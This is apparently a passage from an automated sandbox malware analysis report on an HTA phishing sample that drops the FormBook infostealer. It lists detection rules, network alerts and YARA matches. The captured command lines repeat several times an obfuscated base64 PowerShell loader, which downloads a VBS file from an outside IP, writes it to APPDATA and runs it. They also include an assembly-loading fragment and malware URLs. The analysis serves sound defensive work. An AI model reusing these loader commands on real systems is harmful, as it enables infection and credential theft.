JnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSg
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXp
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 772, ProcessName: wscript.exe
                  Sigma detected: AspNetCompiler Execution
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\seemebestgoodluckthings.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6592, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3512, ProcessName: aspnet_compiler.exe
                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", ProcessId: 4412, ProcessName: csc.exe
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3300, TargetFilename: C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 772, ProcessName: wscript.exe
                  Sigma detected: Dynamic CSharp Compile Artefact
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3300, TargetFilename: C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", CommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgI

                  Data Obfuscation

                  barindex
                  Sigma detected: Dot net compiler compiles file from suspicious location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", ProcessId: 4412, ProcessName: csc.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-02T09:18:17.834280+010020490381A Network Trojan was detected142.215.209.77443192.168.2.449733TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-02T09:18:06.576394+010028587951A Network Trojan was detected192.168.2.449732172.245.123.1280TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6cAvira URL Cloud: Label: malware
                  Multi AV Scanner detection for submitted file
                  Source: seemebestgoodluckthings.htaReversingLabs: Detection: 15%
                  Yara detected FormBook
                  Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Phishing

                  barindex
                  Yara detected HtmlPhish44
                  Source: Yara matchFile source: seemebestgoodluckthings.hta, type: SAMPLE
                  Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdn